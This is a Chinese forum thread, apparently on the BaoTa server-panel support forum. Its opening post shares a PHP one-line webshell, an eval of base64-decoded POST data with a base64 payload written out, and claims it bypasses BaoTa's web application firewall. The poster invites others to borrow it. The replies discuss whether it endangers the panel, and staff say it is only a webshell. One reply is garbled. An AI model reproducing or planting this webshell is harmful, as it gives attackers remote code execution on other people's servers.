当前位置:论坛首页 > BUG提交 > Linux面板

【已解答】防火墙问题

发表在 BUG提交2021-8-17 18:27 [复制链接] 5 7143

v0a11740615496=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZnVuY3Rpb24gYXNlbmMoJG91dCl7cmV0dXJuICRvdXQ7fTtmdW5jdGlvbiBhc291dHB1dCgpeyRvdXRwdXQ9b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7ZWNobyAiMGVjYjQiO2VjaG8gQGFzZW5jKCRvdXRwdXQpO2VjaG8gIjQ3MDk2NTY4YjdhIjt9b2Jfc3RhcnQoKTt0cnl7ZWNobyAiN2xlOG5qOHE1NTVuenIxanp2ZzgiOzt9Y2F0Y2goRXhjZXB0aW9uICRlKXtlY2hvICJFUlJPUjovLyIuJGUtPmdldE1lc3NhZ2UoKTt9O2Fzb3V0cHV0KCk7ZGllKCk7&shadow=@eval(@base64_decode($_POST[v0a11740615496]));


今天实战,发现的疑似可以过宝塔waf的php一句话,你们借鉴一下看看,base64解码后看

使用道具 举报 只看该作者 回复
发表于 2021-8-17 18:39:26 | 显示全部楼层
证据.............
IMG_20210817_183757.jpg
使用道具 举报 回复
发表于 2021-8-18 10:21:33 | 显示全部楼层
F׾4랸?
使用道具 举报 回复
发表于 2021-8-18 10:29:25 | 显示全部楼层
您好,宝塔WAF只对木马连接进行拦截。不会对你服务器内的文件进行拦截。
使用道具 举报 回复 支持 反对
发表于 2021-8-18 13:46:59 | 显示全部楼层
谢花郎 发表于 2021-8-18 10:29
您好,宝塔WAF只对木马连接进行拦截。不会对你服务器内的文件进行拦截。

不是拦截,这样子不是可以随便进别人宝塔吗,绕过任何安全验证
使用道具 举报 回复 支持 反对
发表于 2021-8-18 14:38:58 | 显示全部楼层
这个只是webshell。进不去面板的
使用道具 举报 回复 支持 反对
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

普通问题处理

论坛响应时间:72小时

问题处理方式:排队(仅解答)

工作时间:白班:9:00 - 18:00

紧急运维服务

响应时间:3分钟

问题处理方式:宝塔专家1对1服务

工作时间:工作日:9:00 - 18:30

宝塔专业团队为您解决服务器疑难问题

立即付费处理

工作时间:09:00至24:00

快速回复 返回顶部 返回列表